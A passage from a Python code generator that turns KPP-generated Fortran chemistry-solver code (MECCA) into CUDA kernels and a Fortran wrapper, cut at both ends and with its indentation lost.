line = line[:index+7]+str(int(line[index+7:line.find(")",index)])-1)+line[line.find(")",index):]
index = index + 7
file_temp.write(line)
file_temp.close()
file_temp = open("file_temp2.c","w")
p1 = subprocess.Popen(["gcc","-E","file_temp.c"], stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep","-v","\#"], stdin=p1.stdout, stdout=file_temp)
p2.wait()
file_temp.close()
file_temp = open("file_temp2.c","r")
file_temp.seek(0)
preprocessed = file_temp.readlines()
file_temp.close()
subprocess.call(["rm","-f","file_temp.c","file_temp2.c"])
return preprocessed
def get_rconst_locals(source):
rconst_locals=[]
for line in source:
if "=" in line:
if "IF" not in line:
rconst_locals.append(line.split("=",1)[0].strip())
return rconst_locals
def create_rconst_init(source):
rconst_init=[]
for line in source:
if "rconst" in line:
eline = line.replace("\n","\n")
eline = re.sub(r"rconst(\([0-9]+\))",r"rconst(index,\1-1)",eline)
rconst_init.append( eline )
return rconst_init
def generate_update_rconst(rconst_ops,rconst_decls,locals,rcint):
update_rconst = []
rename_tmp = False
# these are for renaming the rconst ops
for line in rconst_ops:
if ( "temp)" in line):
rename_tmp = True
break
if (rename_tmp == True):
rconst_ops = [w.replace('temp', 'temp_loc') for w in rconst_ops]
rconst_decls = [w.replace('temp', 'temp_loc') for w in rconst_decls]
rconst_ops = [w.replace('press', 'press_loc') for w in rconst_ops]
rconst_decls = [w.replace('press', 'press_loc') for w in rconst_decls]
rconst_ops = [w.replace('cair', 'cair_loc') for w in rconst_ops]
rconst_decls = [w.replace('cair', 'cair_loc') for w in rconst_decls]
update_rconst.append( \
"__device__ void update_rconst(const double * __restrict__ var, \n \
const double * __restrict__ khet_st, const double * __restrict__ khet_tr,\n \
const double * __restrict__ jx, double * __restrict__ rconst, \n\
const double * __restrict__ temp_gpu, \n\
const double * __restrict__ press_gpu, \n\
const double * __restrict__ cair_gpu, \n\
const int VL_GLO)\n")
update_rconst.append("{\n")
update_rconst.append(" int index = blockIdx.x*blockDim.x+threadIdx.x;\n\n")
update_rconst.append(" /* Set local buffer */\n")
update_rconst.append("\n")
update_rconst.append(" {\n")
update_rconst.append(" const double temp_loc = temp_gpu[index];\n")
update_rconst.append(" const double press_loc = press_gpu[index];\n")
update_rconst.append(" const double cair_loc = cair_gpu[index];\n")
update_rconst.append("\n")
line = " double"
for i in locals:
line = line+" "+i+","
line = line[:-1]+";\n"
update_rconst.append(line)
update_rconst.append("\n")
for line in rconst_decls:
line = re.sub(r"IF \(",r"if (",line)
update_rconst.append(" "+line.strip()+";\n")
update_rconst.append("\n")
for line in rconst_ops:
update_rconst.append(" "+line.strip()+";\n")
for line in rcint:
update_rconst.append(" "+line.strip()+";\n")
update_rconst.append(" }\n")
update_rconst.append("}\n")
return update_rconst
pass
#########################################################################################################
#########################################################################################################
def generate_kppsolve(source):
kppsolve=[]
kppsolve.append("__device__ void kppSolve(const double * __restrict__ Ghimj, double * __restrict__ K, \n\
const int istage, const int ros_S )")
kppsolve.append("{\n")
kppsolve.append(" int index = blockIdx.x*blockDim.x+threadIdx.x;\n")
kppsolve.append("\n")
kppsolve.append(" K = &K[istage*NVAR];\n")
kppsolve.append("\n")
for line in source:
line = line.strip()
if line != "":
line = re.sub(r"Ghimj\(index,([0-9]+)\)",r"Ghimj[\1]",line)
line = re.sub(r"K\(index,istage,([0-9]+)\)",r"K[\1]",line)
kppsolve.append(" "+line+";\n")
kppsolve.append("}\n")
return kppsolve
pass
#########################################################################################################
#########################################################################################################
def generate_kppDecomp(source,NSPEC,lu_diag,lu_crow,lu_icol):
kppDecomp = []
kppDecomp.append("__device__ void kppDecomp(double *Ghimj, int VL_GLO)\n")
kppDecomp.append("{\n")
kppDecomp.append(" double a=0.0;\n")
kppDecomp.append("\n")
kppDecomp.append(" double dummy")
for var in range(NSPEC):
kppDecomp.append(", W_" + str(var))
kppDecomp.append(";\n\n")
for line in source:
line = line.strip()
if line != "":
line = re.sub(r"Ghimj\(index,([0-9]+)\)",r"Ghimj[\1]",line)
line = re.sub(r"W\(index,([0-9]+)\)",r"W_\1",line)
kppDecomp.append(" "+line+";\n")
kppDecomp.append("}\n")
return kppDecomp
pass
#########################################################################################################
#########################################################################################################
def generate_kppDecompIndirect(source,NSPEC,lu_diag,lu_crow,lu_icol):
kppDecomp = []
kppDecomp.append("\n")
s_lu = "__device__ const int LU_DIAG[" + str(len(lu_diag)+1) + "] = { "
for i in range(len(lu_diag)):
s_lu = s_lu + str(lu_diag[i]) + ","
s_lu = s_lu + "0 };\n"
kppDecomp.append(s_lu)
s_lu = "__device__ const int LU_CROW[" + str(len(lu_crow)+1) + "] = { "
for i in range(len(lu_crow)):
s_lu = s_lu + str(lu_crow[i]) + ","
s_lu = s_lu + "0 };\n"
kppDecomp.append(s_lu)
s_lu = "__device__ const int LU_ICOL[" + str(len(lu_icol)+1) + "] = { "
for i in range(len(lu_icol)):
s_lu = s_lu + str(lu_icol[i]) + ","
s_lu = s_lu + "0 };\n"
kppDecomp.append(s_lu)
kppDecomp.append("\n")
kppDecomp.append("__device__ void kppDecomp(double *Ghimj, const int VL_GLO)\n")
kppDecomp.append("{\n")
kppDecomp.append(" double a=0.0;\n")
kppDecomp.append(" int k, kk, j, jj;\n")
kppDecomp.append(" double W[" + str(NSPEC) +"];\n")
kppDecomp.append("\n")
loop = "\n\
for (k=0;k<NVAR;k++){ \n\
for ( kk = LU_CROW[k]; kk< (LU_CROW[k+1]-1); kk++){ \n\
W[ LU_ICOL[kk] ]= Ghimj[kk];\n\
}\n\
for ( kk = LU_CROW[k]; kk < (LU_DIAG[k]- 1); k++){\n\
j = LU_ICOL[kk];\n\
a = - W[j] / Ghimj[ LU_DIAG[j]];\n\
W[j] = - a;\n\
for ( jj = LU_DIAG[j]+1; jj< (LU_CROW[j+ 1]- 1); jj++) {\n\
W[ LU_ICOL[jj] ] = W[ LU_ICOL[jj]]+ a*Ghimj[jj];\n\
}\n\
}\n\
for (kk = LU_CROW[k]; kk< (LU_CROW[k+ 1]- 1); kk++ ) {\n\
Ghimj[kk] = W[ LU_ICOL[kk]];\n\
}\n\
}\n"
kppDecomp.append(loop)
kppDecomp.append("}\n")
return kppDecomp
pass
#########################################################################################################
#########################################################################################################
def generate_jac_sp(source,NBSIZE):
jac_sp = []
jac_sp.append("__device__ void Jac_sp(const double * __restrict__ var, const double * __restrict__ fix,\n\
const double * __restrict__ rconst, double * __restrict__ jcb, int &Njac, const int VL_GLO)\n")
jac_sp.append("{\n")
jac_sp.append(" int index = blockIdx.x*blockDim.x+threadIdx.x;\n")
jac_sp.append("\n")
jac_sp.append(" double dummy")
for var in range(NBSIZE):
jac_sp.append(", B_" + str(var))
jac_sp.append(";\n\n")
jac_sp.append("\n")
jac_sp.append(" Njac++;\n")
jac_sp.append("\n")
for line in source:
line = line.strip()
if line != "":
line = re.sub(r"B\(index,([0-9]+)\)",r"B_\1",line)
line = re.sub(r"jcb\(index,([0-9]+)\)",r"jcb[\1]",line)
line = re.sub(r"var\(index,([0-9]+)\)",r"var[\1]",line)
line = re.sub(r"fix\(index,([0-9]+)\)",r"fix[\1]",line)
jac_sp.append(" "+line+";\n")
jac_sp.append(" }\n")
return jac_sp
pass
#########################################################################################################
#########################################################################################################
def generate_fun(source,NREACT):
fun = []
fun.append("__device__ void Fun(double *var, const double * __restrict__ fix, const double * __restrict__ rconst, double *varDot, int &Nfun, const int VL_GLO)")
fun.append("{\n")
fun.append(" int index = blockIdx.x*blockDim.x+threadIdx.x;\n")
fun.append("\n")
fun.append(" Nfun++;\n")
fun.append("\n")
fun.append(" double dummy")
for var in range(NREACT):
fun.append(", A_" + str(var))
fun.append(";\n\n")
fun.append(" {\n")
for line in source:
line = line.strip()
if line != "":
line = re.sub(r"A\(index,([0-9]+)\)",r"A_\1",line)
line = re.sub(r"var\(index,([0-9]+)\)",r"var[\1]",line)
line = re.sub(r"varDot\(index,([0-9]+)\)",r"varDot[\1]",line)
fun.append(" "+line+";\n")
fun.append(" }\n")
fun.append("}\n")
return fun
pass
#########################################################################################################
#########################################################################################################
def find_LU_DIAG(file_in, NVAR):
file_in.seek(0)
source = file_in.readlines()
the_line = 0
glu_diag = []
long_tables = False
for line_num in range(len(source)):
if "lu_diag_0" in source[line_num].lower():
print("Detected long tables!")
long_tables = True
the_line = line_num
break
for line_num in range(len(source)):
if (long_tables == True):
if "lu_diag " in source[line_num].lower():
end_line = line_num
else:
if "lu_diag" in source[line_num].lower():
the_line = line_num
break
lu_diag = []
if (long_tables == True):
for line_num in range(the_line,end_line):
lu_diag.append(source[line_num])
else:
for line_num in range(the_line,len(source)):
lu_diag.append(source[line_num])
if "/)" in source[line_num]:
break;
lu_diag = remove_comments(lu_diag)
lu_diag = strip_and_unroll_lines(lu_diag)
lu_diag = "".join(lu_diag)
lu_diag = lu_diag.lower()
lu_diag = lu_diag[lu_diag.find("(/")+2:lu_diag.rfind("/)")]
lu_diag = re.sub(r"\/\)\ninteger, parameter, dimension\([0-9]+\)?\s::?\slu_diag_[0-9]?\s=?\s\(/",r",",lu_diag)
# if failes break it in smaller
lu_diag = re.sub(r"dimension\([0-9]+\)::lu_diag_[0-9]\s?=\s?\(\/",r",",lu_diag)
lu_diag = re.sub(r"dimension\([0-9]+\)", r"",lu_diag)
lu_diag = re.sub(r"::", r"",lu_diag)
lu_diag = re.sub(r"lu_diag_[0-9]+\s?=\s?",r"",lu_diag)
lu_diag = re.sub(r"\(/",r"",lu_diag)
lu_diag = lu_diag.replace("/)\ninteger","")
lu_diag = lu_diag.replace("parameter,","")
lu_diag = lu_diag.replace(" ","")
lu_diag = lu_diag.split(",")
for line_num in range(len(lu_diag)):
lu_diag[line_num] = str(int(lu_diag[line_num])-1)
return lu_diag
def find_LU_CROW(file_in, NVAR):
file_in.seek(0)
source = file_in.readlines()
the_line = 0
glu_diag = []
long_tables = False
for line_num in range(len(source)):
if "lu_crow_0" in source[line_num].lower():
print("Detected long tables!")
long_tables = True
the_line = line_num
break
for line_num in range(len(source)):
if (long_tables == True):
if "lu_crow " in source[line_num].lower():
end_line = line_num
else:
if "lu_crow" in source[line_num].lower():
the_line = line_num
break
lu_diag = []
if (long_tables == True):
for line_num in range(the_line,end_line):
lu_diag.append(source[line_num])
else:
for line_num in range(the_line,len(source)):
lu_diag.append(source[line_num])
if "/)" in source[line_num]:
break;
lu_diag = remove_comments(lu_diag)
lu_diag = strip_and_unroll_lines(lu_diag)
lu_diag = "".join(lu_diag)
lu_diag = lu_diag.lower()
lu_diag = lu_diag[lu_diag.find("(/")+2:lu_diag.rfind("/)")]
lu_diag = re.sub(r"\/\)\ninteger, parameter, dimension\([0-9]+\)?\s::?\slu_crow_[0-9]?\s=?\s\(/",r",",lu_diag)
# if failes break it in smaller
lu_diag = re.sub(r"dimension\([0-9]+\)::lu_crow_[0-9]\s?=\s?\(\/",r",",lu_diag)
lu_diag = re.sub(r"dimension\([0-9]+\)", r"",lu_diag)
lu_diag = re.sub(r"::", r"",lu_diag)
lu_diag = re.sub(r"lu_crow_[0-9]\s?=\s?",r"",lu_diag)
lu_diag = re.sub(r"\(/",r"",lu_diag)
lu_diag = lu_diag.replace("/)\ninteger","")
lu_diag = lu_diag.replace("parameter,","")
lu_diag = lu_diag.replace(" ","")
lu_diag = lu_diag.split(",")
for line_num in range(len(lu_diag)):
lu_diag[line_num] = str(int(lu_diag[line_num])-1)
return lu_diag
def find_LU_ICOL(file_in, NVAR):
file_in.seek(0)
source = file_in.readlines()
the_line = 0
glu_diag = []
long_tables = False
for line_num in range(len(source)):
if "lu_icol_0" in source[line_num].lower():
print("Detected long tables!")
long_tables = True
the_line = line_num
break
for line_num in range(len(source)):
if (long_tables == True):
if "lu_icol " in source[line_num].lower():
end_line = line_num
else:
if "lu_icol" in source[line_num].lower():
the_line = line_num
break
lu_diag = []
if (long_tables == True):
for line_num in range(the_line,end_line):
lu_diag.append(source[line_num])
else:
for line_num in range(the_line,len(source)):
lu_diag.append(source[line_num])
if "/)" in source[line_num]:
break;
lu_diag = remove_comments(lu_diag)
lu_diag = strip_and_unroll_lines(lu_diag)
lu_diag = "".join(lu_diag)
lu_diag = lu_diag.lower()
lu_diag = lu_diag[lu_diag.find("(/")+2:lu_diag.rfind("/)")]
lu_diag = re.sub(r"\/\)\ninteger, parameter, dimension\([0-9]+\)?\s::?\slu_icol_[0-9]?\s=?\s\(/",r",",lu_diag)
# if failes break it in smaller
lu_diag = re.sub(r"dimension\([0-9]+\)::lu_icol_[0-9]\s?=\s?\(\/",r",",lu_diag)
lu_diag = re.sub(r"dimension\([0-9]+\)", r"",lu_diag)
lu_diag = re.sub(r"::", r"",lu_diag)
lu_diag = re.sub(r"lu_icol_[0-9]+\s?=\s?",r"",lu_diag)
lu_diag = re.sub(r"\(/",r"",lu_diag)
lu_diag = lu_diag.replace("/)\ninteger","")
lu_diag = lu_diag.replace("parameter,","")
lu_diag = lu_diag.replace(" ","")
lu_diag = lu_diag.split(",")
for line_num in range(len(lu_diag)):
lu_diag[line_num] = str(int(lu_diag[line_num])-1)
return lu_diag
#########################################################################################################
def generate_prepareMatrix(lu_diag):
prepareMatrix = []
prepareMatrix.append("__device__ void ros_PrepareMatrix(double &H, int direction, double gam, double *jac0, double *Ghimj, int &Nsng, int &Ndec, int VL_GLO)\n")
prepareMatrix.append("{\n")
prepareMatrix.append(" int index = blockIdx.x*blockDim.x+threadIdx.x;\n")
prepareMatrix.append(" int ising, nConsecutive;\n")
prepareMatrix.append(" double ghinv;\n")
prepareMatrix.append(" \n")
prepareMatrix.append(" ghinv = ONE/(direction*H*gam);\n")
prepareMatrix.append(" for (int i=0; i<LU_NONZERO; i++)\n")
prepareMatrix.append(" Ghimj[i] = -jac0[i];\n\n")
for i in lu_diag:
prepareMatrix.append(" Ghimj["+i+"] += ghinv;\n")
prepareMatrix.append(" ros_Decomp(Ghimj, Ndec, VL_GLO);\n")
prepareMatrix.append("}\n")
return prepareMatrix
pass
#########################################################################################################
def generate_special_ros(ros,inject_rconst):
if ( ros == '2'):
file_ros = open("./source/ros2.cu","r")
elif (ros == '3'):
file_ros = open("./source/ros3.cu","r")
elif (ros == '4'):
file_ros = open("./source/ros4.cu","r")
elif (ros == '5'):
file_ros = open("./source/rodas3.cu","r")
elif (ros == '6'):
file_ros = open("./source/rodas4.cu","r")
else:
return ''
rosfunc = []
source = file_ros.readlines()
for line in source:
if ( inject_rconst is True ):
line = line.replace("Jac_sp(var, fix, rconst, jac0, Njac, VL_GLO)","update_rconst(var, khet_st, khet_tr, jx, VL_GLO); \n Jac_sp(var, fix, rconst, jac0, Njac, VL_GLO)")
line = line.replace("Fun(varNew, fix, rconst, varNew, Nfun,VL_GLO);","update_rconst(var, khet_st, khet_tr, jx, VL_GLO); \n Fun(varNew, fix, rconst, varNew, Nfun,VL_GLO);")
line = line.replace("Fun(var, fix, rconst, Fcn0, Nfun, VL_GLO);","update_rconst(var, khet_st, khet_tr, jx, VL_GLO); \n Fun(var, fix, rconst, Fcn0, Nfun, VL_GLO);")
rosfunc.append(line)
return rosfunc
pass
#########################################################################################################
def generate_special_ros_caller(ros):
roscall = []
default_call = ' Rosenbrock<<<dimGrid,dimBlock>>>(d_conc, Tstart, Tend, d_rstatus, d_istatus,\n\
// values calculated from icntrl and rcntrl at host\n\
autonomous, vectorTol, UplimTol, method, Max_no_steps,\n\
d_jac0, d_Ghimj,d_varNew, d_K, d_varErr, d_dFdT, d_Fcn0, d_var, d_fix, d_rconst,\n\
Hmin, Hmax, Hstart, FacMin, FacMax, FacRej, FacSafe, roundoff,\n\
// cuda global mem buffers \n\
d_absTol, d_relTol, \n\
d_khet_st, d_khet_tr, d_jx, \n\
// Global input arrays\n\
temp_gpu, press_gpu, cair_gpu, \n\
// extra - vector lenght and processor\n\
VL_GLO); '
if ( ros == '2'):
rosscall = ' switch (method){\n\
case 1:\n\
Rosenbrock_ros2<<<dimGrid,dimBlock>>>(d_conc, Tstart, Tend, d_rstatus, d_istatus,\n\
autonomous, vectorTol, UplimTol, Max_no_steps,\n\
d_jac0, d_Ghimj,d_varNew, d_K, d_varErr, d_dFdT, d_Fcn0, d_var, d_fix, d_rconst,\n\
Hmin, Hmax, Hstart, FacMin, FacMax, FacRej, FacSafe, roundoff,\n\
d_absTol, d_relTol,\n\
d_khet_st, d_khet_tr, d_jx, \n\
temp_gpu, press_gpu, cair_gpu, \n\
VL_GLO);\n\
break;\n\
default: \n' + default_call + '\n\
\n\
break;\n\
}\n'
elif (ros == '3'):
rosscall = ' switch (method){\n\
case 2:\n\
Rosenbrock_ros3<<<dimGrid,dimBlock>>>(d_conc, Tstart, Tend, d_rstatus, d_istatus,\n\
autonomous, vectorTol, UplimTol, Max_no_steps,\n\
d_jac0, d_Ghimj,d_varNew, d_K, d_varErr, d_dFdT, d_Fcn0, d_var, d_fix, d_rconst,\n\
Hmin, Hmax, Hstart, FacMin, FacMax, FacRej, FacSafe, roundoff,\n\
d_absTol, d_relTol,\n\
d_khet_st, d_khet_tr, d_jx, \n\
temp_gpu, press_gpu, cair_gpu, \n\
VL_GLO);\n\
break;\n\
default: \n' + default_call + '\n\
\n\
break;\n\
}\n'
elif (ros == '4'):
rosscall = ' switch (method){\n\
case 3:\n\
Rosenbrock_ros4<<<dimGrid,dimBlock>>>(d_conc, Tstart, Tend, d_rstatus, d_istatus,\n\
autonomous, vectorTol, UplimTol, Max_no_steps,\n\
d_jac0, d_Ghimj,d_varNew, d_K, d_varErr, d_dFdT, d_Fcn0, d_var, d_fix, d_rconst,\n\
Hmin, Hmax, Hstart, FacMin, FacMax, FacRej, FacSafe, roundoff,\n\
d_absTol, d_relTol,\n\
d_khet_st, d_khet_tr, d_jx, \n\
temp_gpu, press_gpu, cair_gpu, \n\
VL_GLO);\n\
break;\n\
default: \n' + default_call + '\n\
\n\
break;\n\
}\n'
elif (ros == '5'):
rosscall = ' switch (method){\n\
case 4:\n\
Rosenbrock_rodas3<<<dimGrid,dimBlock>>>(d_conc, Tstart, Tend, d_rstatus, d_istatus,\n\
autonomous, vectorTol, UplimTol, Max_no_steps,\n\
d_jac0, d_Ghimj,d_varNew, d_K, d_varErr, d_dFdT, d_Fcn0, d_var, d_fix, d_rconst,\n\
Hmin, Hmax, Hstart, FacMin, FacMax, FacRej, FacSafe, roundoff,\n\
d_absTol, d_relTol,\n\
d_khet_st, d_khet_tr, d_jx, \n\
temp_gpu, press_gpu, cair_gpu, \n\
VL_GLO);\n\
break;\n\
default: \n' + default_call + '\n\
\n\
break;\n\
}\n'
elif (ros == '6'):
rosscall = ' switch (method){\n\
case 5:\n\
Rosenbrock_rodas4<<<dimGrid,dimBlock>>>(d_conc, Tstart, Tend, d_rstatus, d_istatus,\n\
autonomous, vectorTol, UplimTol, Max_no_steps,\n\
d_jac0, d_Ghimj,d_varNew, d_K, d_varErr, d_dFdT, d_Fcn0, d_var, d_fix, d_rconst,\n\
Hmin, Hmax, Hstart, FacMin, FacMax, FacRej, FacSafe, roundoff,\n\
d_absTol, d_relTol,\n\
d_khet_st, d_khet_tr, d_jx, \n\
temp_gpu, press_gpu, cair_gpu, \n\
VL_GLO);\n\
break;\n\
default: \n' + default_call + '\n\
\n\
break;\n\
}\n'
else:
return default_call
return rosscall
pass
#########################################################################################################
#########################################################################################################
def generate_define_indices_one_line(file_in,prefix):
file_in.seek(0)
source = file_in.readlines()
source = remove_comments(source)
source = strip_and_unroll_lines(source)
the_line = 0
for line in source:
if prefix+"_" in line:
the_line = line
break
the_line = the_line[the_line.find("::")+2:].replace("=","").replace(" "," ").replace(" "," ").replace(" "," ").replace(" "," ").replace(" "," ").replace("\n"," ")
the_line = the_line.split(",")
for i in range(len(the_line)):
if (len(the_line[i])<3):
continue;
# return;
the_line[i] = the_line[i].strip()
name, value = the_line[i].split(" ")
the_line[i] = "#define "+name+" "+str(int(value)-1)+"\n"
return the_line
def generate_define_indices_many_lines(file_in,prefix):
file_in.seek(0)
source = file_in.readlines()
source = remove_comments(source)
source = strip_and_unroll_lines(source)
the_line = 0
for i in range(len(source)):
if " "+prefix+"_" in source[i]:
the_line = i
break
ind_s = []
for i in range(the_line,len(source)):
source[i] = source[i].strip()
if prefix+"_" not in source[i] and source[i] != "":
break
if prefix+"_" in source[i]:
ind_s.append(source[i])
for i in range(len(ind_s)):
ind_s[i] = ind_s[i][ind_s[i].find("::")+2:].strip().replace("=","").replace(" "," ").replace(" "," ").replace(" "," ").replace(" "," ").replace(" "," ")
name,value = ind_s[i].split(" ")
ind_s[i] = "#define "+name+" "+str(int(value)-1)+"\n"
return ind_s
def generate_define_vars(file_in,var_names):
file_in.seek(0)
source = file_in.readlines()
source = remove_comments(source)
source = strip_and_unroll_lines(source)
out = []
for line in source:
if var_names == []:
break
for var_name in var_names:
if var_name in line and "=" in line:
var = line[line.find("::")+2:].strip()
name,value = var.split("=")
name = name.strip()
value = value.strip().replace("_dp","").replace("_DP","").replace("_Dp","")
if "real" in line.lower():
value = float(value)
elif "integer" in line.lower():
value = int(value)
else:
value = int(value)
out.append("#define "+name+" "+str(value)+"\n")
var_names.remove(var_name)
if var_names != []:
print("Warning: variables "+str(var_names)+" were not found")
return out
#
# Takes prefix of variables as input and the file
# Returns definitions using index
#
def generate_definitions_global(file_in,var_prefix):
file_in.seek(0)
source = file_in.readlines()
source = remove_comments(source)
source = strip_and_unroll_lines(source)
out = []
for var_name in var_prefix:
for line in source:
# ignore some definitions that are not double
if "INTEGER" in line:
continue
# we reached after the definitions
if "interface" in line:
break
allvars = re.findall(r'(' + var_name + '(\w+)(\s+)?)=\s+(([0-9,E,\-,.])+(\s+)?)[,&,\n]',line)
if ( len(allvars) > 0):
for definition in allvars:
out.append("#define "+definition[0]+" ("+str(definition[3])+")\n")
return out
pass
#########################################################################################################
#########################################################################################################
def gen_kpp_integrate_cuda(file_prototype, source_cuda, inject_rconst):
file_prototype.seek(0)
lines_prototype = file_prototype.readlines()
file_out = open(smcl + "messy_mecca_kpp_acc.cu","w")
for line in lines_prototype:
if "=#=#=#=#=#=#=#=#=#=#=" in line:
chunk_name = line.replace("=#=#=#=#=#=#=#=#=#=#=","").replace("=#=#=#=#=#=#=#=#=#=#=","").strip().lower()
chunk = source_cuda[chunk_name]
if chunk is not None:
for chunk_line in chunk:
chunk_line = remove_precision_qualifiers(chunk_line)
file_out.write(chunk_line)
else:
if ( inject_rconst is True ):
line = line.replace("Jac_sp(var, fix, rconst, jac0, Njac, VL_GLO)","update_rconst(var, khet_st, khet_tr, jx, VL_GLO); \n Jac_sp(var, fix, rconst, jac0, Njac, VL_GLO)")
line = line.replace("Fun(varNew, fix, rconst, varNew, Nfun,VL_GLO);","update_rconst(var, khet_st, khet_tr, jx, VL_GLO); \n Fun(varNew, fix, rconst, varNew, Nfun,VL_GLO);")
line = line.replace("Fun(var, fix, rconst, Fcn0, Nfun, VL_GLO);","update_rconst(var, khet_st, khet_tr, jx, VL_GLO); \n Fun(var, fix, rconst, Fcn0, Nfun, VL_GLO);")
line = line.replace("Fun(var, fix, rconst, dFdT, Nfun, VL_GLO);","update_rconst(var, khet_st, khet_tr, jx, VL_GLO); \n Fun(var, fix, rconst, dFdT, Nfun, VL_GLO);")
file_out.write(line)
file_out.close()
pass
#########################################################################################################
#########################################################################################################
def generate_define_NBSIZE(source):
lines = source[:]
lines = remove_comments(lines)
lines = strip_and_unroll_lines(lines)
nbsize = ""
for line in lines:
if ":: b(" in line.lower():
index = line.lower().find(":: b(")+5
nbsize = "#define NBSIZE "+line[index:line.find(")",index)].strip()
break
return nbsize
pass
#########################################################################################################
#########################################################################################################
def remove_precision_qualifiers(line):
operators = "*/+-<>=.,"
var_name = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_'
precision_qualifiers = ["_sp","_dp","_qp"]
truth_mat = []
for qual in precision_qualifiers:
truth_mat.append((qual in line.lower())*1)
if any(truth_mat):
for truth_id in range(len(truth_mat)):
qual = 0
if truth_mat[truth_id]:
qual = precision_qualifiers[truth_id]
index = len(line)
while True:
index = line.rfind(qual,0, index-1)
if index == -1:
break
left = line[:index]
right = line[index:]
#if left[-3:].lower() in precision_qualifiers: # if it's 33._dp, 33.33E-33_dp or a_333_dp
number = 0
if left[-1] == ".": # if it's 33._dp
number = 1
elif left[-1] in var_name: # if it's 33.33E-33_dp or a_333_dp
pos=0
scientif = False
isnumber = True
for i in reversed(left[:]):
if i not in string.digits+".":
if (i in "+-") and abs(pos-2)<=len(left) and (left[pos-2].lower() == "e"):
scientif = True
elif scientif and i.lower() == "e":
pass
elif i in string.ascii_letters+"_": # if it's a_333_dp
pos=0
for i in reversed(left[:]):
if i not in var_name:
break
pos = pos - 1
isnumber = False
break
else:
break
pos = pos - 1
number = not ((not isnumber) and (not scientif))
line = left + (not number)*right[:3] + right[3:]
return line
pass
#########################################################################################################
#########################################################################################################
def generate_c2f_interface(file_in):
file_in.seek(0)
source = file_in.readlines()
start = -1
stop = -1
for i in range(len(source)):
if 'subroutinekpp_integrate' in source[i].lower().replace(" ",""):
if start == -1:
start = i
elif "end" in source[i].lower().replace(" ",""):
stop = i
break
else:
print("Something went wrong in generate c2f_interface")
return
file_out = open(smcl + "messy_mecca_kpp.f90","w")
for i in range(start):
file_out.write(source[i])
out = "SUBROUTINE kpp_integrate (time_step_len,Conc,ierrf,xNacc,xNrej,istatus,l_debug,PE) \n\
\n\
IMPLICIT NONE \n\
\n\
REAL(dp),INTENT(IN) :: time_step_len \n\
REAL(dp),INTENT(INOUT),dimension(:,:) :: Conc \n\
INTEGER, INTENT(OUT),OPTIONAL :: ierrf(:) \n\
INTEGER, INTENT(OUT),OPTIONAL :: xNacc(:) \n\
INTEGER, INTENT(OUT),OPTIONAL :: xNrej(:) \n\
INTEGER, INTENT(INOUT),OPTIONAL :: istatus(:) \n\
INTEGER, INTENT(IN),OPTIONAL :: PE \n\
LOGICAL, INTENT(IN),OPTIONAL :: l_debug \n\
\n\
integer, save :: counter = 0 ! For debuging\n\
integer, save :: newcounter = 0 ! For debuging\n\
\n\
\n\
INTEGER :: k ! loop variable \n\
REAL(dp) :: dt \n\
REAL(dp) :: roundoff\n\
integer,dimension(:),allocatable :: xNacc_u, xNrej_u, ierr_u2\n\
integer :: ierr_u \n\
integer :: i\n\
integer :: j\n\
integer :: istep\n\
integer,dimension(20) :: istatus_u \n\
integer,dimension(5) :: sizes\n\
\n\
LOGICAL :: file_exists\n\
\n\
character(len=10) :: filename\n\
CHARACTER(LEN=3000) :: rowfmt\n\
\n\
if (present (istatus)) istatus = 0 \n\
\n\
\n\
allocate(xNacc_u(VL_GLO))\n\
allocate(xNrej_u(VL_GLO))\n\
allocate(ierr_u2(VL_GLO))\n\
\n\
\n\
sizes(1) = VL_glo\n\
sizes(2) = size(khet_st,2)\n\
sizes(3) = size(khet_tr,2)\n\
sizes(4) = size(jx,2)\n\
roundoff = WLAMCH('E')\n\
\n\
\n\
#if 1\n\
\n\
CALL kpp_integrate_cuda(PE, sizes, time_step_len, Conc, temp, press, cair, &\n\
khet_st, khet_tr, jx, aTol, rTol, ierr_u2, istatus_u, xNacc_u, xNrej_u, roundoff, icntrl, rcntrl)\n\
\n\
DO k=1,VL_glo,VL_DIM \n\
is = k \n\
ie = min(k+VL_DIM-1,VL_glo) \n\
vl = ie-is+1 \n\
\n\
! Return Diagnostic Information \n\
\n\
if(Present(ierrf)) ierrf(is) = IERR_U \n\
if(Present(xNacc)) xNacc(is) = istatus_u(4) \n\
if(Present(xNrej)) xNrej(is) = istatus_u(5) \n\
\n\
if (present (istatus)) then \n\
istatus(1:8) = istatus(1:8) + istatus_u(1:8) \n\
end if \n\
\n\
END DO \n\
\n\
#endif\n\
\n\
#if 0\n\
\n\
DO k=1,VL_glo,VL_DIM \n\
is = k \n\
ie = min(k+VL_DIM-1,VL_glo) \n\
vl = ie-is+1 \n\
\n\
C(:) = Conc(is,:) \n\
\n\
CALL update_rconst \n\
\n\
dt = time_step_len \n\
\n\
! integrate from t=0 to t=dt \n\
CALL integrate(0._dp,dt,icntrl,rcntrl,istatus_u = istatus_u,ierr_u=ierr_u)\n\
\n\
\n\
IF (PRESENT(l_debug) .AND. PRESENT(PE)) THEN \n\
IF (l_debug) CALL error_output(Conc(is,:),ierr_u,PE) \n\
ENDIF \n\
Conc(is,:) = C(:) \n\
\n\
if(Present(ierrf)) ierrf(is) = IERR_U \n\
if(Present(xNacc)) xNacc(is) = istatus_u(4) \n\
if(Present(xNrej)) xNrej(is) = istatus_u(5) \n\
\n\
if (present (istatus)) then \n\
istatus(1:8) = istatus(1:8) + istatus_u(1:8) \n\
end if \n\
\n\
END DO \n\
#endif\n\
\n\
! Deallocate input arrays \n\
\n\
if (allocated(TEMP)) deallocate(TEMP) \n\
if (allocated(cair)) deallocate(cair) \n\
if (allocated(press)) deallocate(press) \n\
if (allocated(temp_ion)) deallocate(temp_ion) \n\
if (allocated(temp_elec)) deallocate(temp_elec) \n\
if (allocated(xaer)) deallocate(xaer) \n\
if (allocated(cvfac)) deallocate(cvfac) \n\
if (allocated(lwc)) deallocate(lwc) \n\
if (allocated(k_exf)) deallocate(k_exf) \n\
if (allocated(k_exb)) deallocate(k_exb) \n\
if (allocated(k_exf_N2O5)) deallocate(k_exf_N2O5) \n\
if (allocated(k_exf_ClNO3)) deallocate(k_exf_ClNO3) \n\
if (allocated(k_exf_BrNO3)) deallocate(k_exf_BrNO3) \n\
if (allocated(jx)) deallocate(jx) \n\
if (allocated(khet_Tr)) deallocate(khet_Tr) \n\
if (allocated(khet_St)) deallocate(khet_St) \n\
if (allocated(mcexp)) deallocate(mcexp) \n\
\n\
deallocate(xNacc_u)\n\
deallocate(xNrej_u)\n\
